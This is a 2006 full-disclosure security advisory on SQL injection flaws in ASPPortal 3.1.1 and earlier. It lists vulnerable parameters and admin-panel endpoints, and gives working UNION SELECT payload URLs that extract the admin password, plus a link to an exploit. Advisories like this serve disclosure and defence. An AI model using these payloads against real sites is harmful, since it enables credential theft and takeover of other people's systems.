--Security Report-- Advisory: ASPPortal <= 3.1.1 Multiple Remote SQL Injection Vulnerabilities --- Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI --- Date: 20/03/06 11:14 PM --- Contacts:{ ICQ: 10072 MSN/Email: nukedx@nukedx.com Web: http://www.nukedx.com } --- Vendor: ASPPortal (http://www.ASPPortal.net/) Version: 3.1.1 and prior versions must be affected. About: There is lots of SQL injections in modules of ASPPortal via this methods remote attacker can inject arbitrary SQL queries.In below i included some with their examples and also coded exploit for second one exploit decrypts password which comes from SQL injection too, Because ASPPortal has it own crypting mechanism.As you can see in downloads module page download_click.asp's downloadid parameter and news module page News_Item.asp's content_ID parameter did not sanitized properly.Also there is some SQL injections in admin panel but for using them you need admin access.You can found them in below as ADMINGET and ADMINPOST tags. Level: Critical --- How&Example: GET -> http://[site]/apdir/content/downloads/download_click.asp?downloadid=[SQLCode] GET -> http://[site]/apdir/content/news/News_Item.asp?content_ID=[SQLCode] Example -> http://[site]/apdir/content/downloads/download_click.asp?downloadid=-1+UNION+SELECT+0,0,0,0,0,0,0,0,0,0, password+FROM+users+where+username='admin' Example -> http://[site]/apdir/content/news/News_Item.asp?content_ID=-1+UNION+SELECT+username,password,0,0, group_id,email,0,0,0,0,0,0,0,0,0,0+FROM+users+where+username='admin' With this examples remote attacker could get admin's pass and can login from /content/users/login.asp ADMINGET -> http://[site]/apdir/content/users/add_edit_user.asp?page_type=2&user_id=[SQLCode] ADMINGET -> http://[site]/apdir/content/banner_adds/banner_add_edit.asp?pagetype=2&bannerid=[SQLCode] ADMINGET -> http://[site]/apdir/content/categories/add_edit_cat.asp?page_type=2&cat_id=[SQLCode] ADMINGET -> http://[site]/apdir/content/News/add_edit_news.asp?page_type=2&Content_ID=[SQLCode] ADMINGET -> http://[site]/apdir/content/downloads/add_edit_download.asp?page_type=2&download_id=[SQLCode] ADMINGET -> http://[site]/apdir/content/poll/add_edit_poll.asp?page_type=2&Poll_ID=[SQLCode] ADMINGET -> http://[site]/apdir/content/contactus/contactus_add_edit.asp?contactid=[SQLCode]&pageid=2 ADMINGET -> http://[site]/apdir/content/poll/poll_list.asp?sortby=[SQLCode]&page_no=1 ADMINPOST -> http://[site]/apdir/content/downloads/add_edit_download.asp?page_type=1 -- Timeline: * 20/03/2006: Vulnerability found. * 20/03/2006: Contacted with vendor and waiting reply. --- Exploit: http://www.nukedx.com/?getxpl=21 --- References: http://www.milw0rm.com/id.php?id=1597 --- Original advisory can be found at: http://www.nukedx.com/?viewdoc=21 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/